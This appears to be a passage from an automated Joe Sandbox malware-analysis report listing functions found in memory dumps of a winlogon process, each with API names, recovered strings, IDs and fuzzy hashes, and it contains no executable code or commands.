                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 48E15A73624B82CAEB609B65D4803DDB7E0FB55798F140126EE8D57B99CF38D481CB02
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: ea488144e67ee9814cb3c00e2a8ac0c782a2014a7bbb5d57e2db9a248e5ddb93
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: F4E18D72628BC1CAEB609F65D4813DDB7A4FB89B99F100126EE8D57B9ADF34C491C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: ea3d8d01707ad5d94a13b4fba9cf6eb05f996a68f408e0993dfcc1eae4dccdcf
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: AFE16972624B81CAFB609B65E4813DDB7A4FF85B99F100126EE8D57B9ACF34C591CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 44c234c9404ffe7b5e1619124c70eb274fb59fe55c9541b10c09b14d45380197
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 2C410032331A92C1EA16DB66E8087DEB391FF49BE0F19513B9D0E97786EE38C4458700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 9981850cc48d31037741c2cded26c72f9a92758d62ae1b8330bcbb02fb765734
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 5F414F73224BC4C6E760DF61E44479EB7A1F789B98F44812ADE8A07B58DF38C585CB40
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E85898C7DE,?,?,?,?,?,?,?,?,000001E85898CF9D,?,?,00000001), ref: 000001E85898D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 9c311fea4b2fa3c9ab43cbea4d372c8830d6ac0f2b4a448fbd82eec820a9dce2
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: A8110A717242C6C1FA68AB25D9513FDF1416FC47F0F546336AC3E476EADE68C4028A00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: f82d139e0262af235c5c503c080292d7917c2a0aa74f472ae0aed1caa77cd681
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 5F816B396202C3EAFB50AB65E8813EDF691AF85780F544437AD0DA7796EE38C8458F11
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: ed1d6103eff1dcc676994d656ad2f911c5872803e8dc8710478f2b646a537078
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: F831A4313226C2E2EE229B42E4407EDB694BF48BA0F5905379D5E47792EF39C4658B10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 848c5f808f98b7fe64fe1be9f14dffa162bf3ffb4f70aadf000dfa4e6251c1b3
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: C6115B31320AC0C6E7619B56E84439DB6A1FB88FE4F444226EE5E877A4DF38C8148744
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: c1fd6422857e38418c878c4cd41444f40647f04957361f5aedf899a272e96910
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 22315A32721B92C2EA15DF96E5407ADF7A1BF44B84F0841329E4D47B59EF38C4A1CB00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: cd1afe50f7e6de5fdb75e3b85d99f54b8b5774328d87a634973043da6fa4d35a
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: 061159312212C6C2FA69A721D5953BDF2426F887F4F141736AC3F876EADE6884018A00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 60db19895ce507a708008e45d9c0298ffec254aa5bc9d4092071c0d004566a38
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 28011731320AC1C2EB64DB52E89879DB3A6FB88BC4F884036DE5E53755DE38C989C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: 18b328c97b5f9e14fffcfa9212a447ac2abda381c2e5647efa8e85a057c85cab
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 19011775321BC0C6EB259B62E84879DB2A1BF49B86F04443ACD4E07B65EF3DC1488B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: c300b2b6b54622bad3c43c23df103e30e38a6bb1438ec9a2dd89e032c6842fde
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 53518932729683CAEB54CB15E848B9DB7A6FB44B88F508536DE4B47788DF39C841CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: d0bcd0cf9b4692289a878d77c8ac4738952449dce6fe18ad4e1a7071ab5e44cd
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: D4F03C723246C1D2EB609B61F9C479DB761FB88BC8F844032DE4D46954DE2CC68DCB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: e6b40846573bec2309256a1e3779184d66e370f070609bbf47c065b346f7c57b
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: A2F06271221685D1FB108F29E84539DB321EF857A1F54062ADE6E452E4CF2CC045C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 177804a8e33fc8a1ffb9e6d06ac6c2892e3a9ed2a31dc03627c06d5a34e3f628
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: A4F0F874624BC5D2EA148F53F9551ADB662AF48FD0F489132EE4E47B18DE2CC4858700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction ID: ff1100847cf1c0e0aadc7ec0e970ba072bd13cc79387902f55229e6ec2abdf55
                                                                                • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                                • Instruction Fuzzy Hash: 0361C436629A85CAE760DB55E45039EB7A0FB88784F504127EE8E87BA8DF7CC444CF00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 63986d8d169832ca2b3c9ff94d929ac1109ad7e490c18855dc707efbf0d460dd
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 5D11A3B2B30AD092F67A5569D4653EDB1477F783B8F090636AD7E077D6EE24C8414201
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: b4ee51cf0a1e5aea1822e43a26c047e5dcf7f4fbb0b99cff55914cd4d144b702
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 7511E932AB0ED1D2FAA42528E4523EDBF806F59374F49873BAD7E067D6CE26C8417101
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 13a26281ade054cd1280fdbce72e43605aafa02c3cf2d887f28f1c2fac503938
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: D511A332A30AD191FA64192AE4413EDB1906F59374FD8873BBD6E076E6CE38C8417100
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 45fbb07566537809df07c08353ba596d2c45bc6c88eb3f332a9267d3a220cd63
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: A661C6766286C0CEFA658BA9E5443EEFAA0EF85746F508837CE0E177A5DF34C8458300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: bbb57aa9e3b830d463c4fe85b52b4203214c9bc4de7028ccc68d76f93c744b6c
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 2761A2766206C0C2FA659B65E5443EEFAA1EF867A6F544837CE0E17BA4DF34C8458300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: bb76fc1650d308761c410147ea84cb38f2e16afbcf0730215f2385a251eb584a
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 6C614633610A85CAEB209F65D4803DDB7A1FB48B88F044226EE4E17B99DF78C595CB02
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 49808e8ca0374573422c17999fa92c520f6827b0ca759f7661e9c90c8d8cbcb6
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: C85138732206C2CBEB648B25D58439DB7E0EB54B99F184126DE9D87A96CF38D491CF02
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: b8cb1cdd645de17ac90d150e5576baa1f770b257ea5295feeb99f43c7e10e3bf
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: A9517A322292C0CEEB648B65D45439CB7E0FB55B96F188227DE9D87B95CF39D490C702
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 0ad0f10a0311de8fe70e4511306a68505f179f6318197c4e8bd1820910d7e08b
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: DF517E322242C1CAEB648B25E44439DB7E0FF55B9AF184127DE9D87B95CF38D491CB0A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 5afbde93f76065e937d33a33ecda40d7cc0652e0afb463397a4e63f594b95558
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: B751B932629280CEEB55CF15E445BDCB799FB48BD9F508076DE0A63788EFB4D8418704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: bfd78980145a28763c880af9517e8ac90edd43b032dea0cdb72a4fbda65ea15a
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 4A51AC32621680CAEB14CF15E445BDEB799FF54B9AF508176DE4E63788EF34D8428B04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: a63bd806f66d012ce775473c1f40d5f64a693a31238674c758956550f9c12806
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: F0318832225680DAEB159F11E849BDDBBA9FB48BD9F458036AE5E13788DF38C940C704
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 56d3e007963a7e7881fb8535ced7d73073085fdb1eb8715deed5cad551f2bc8b
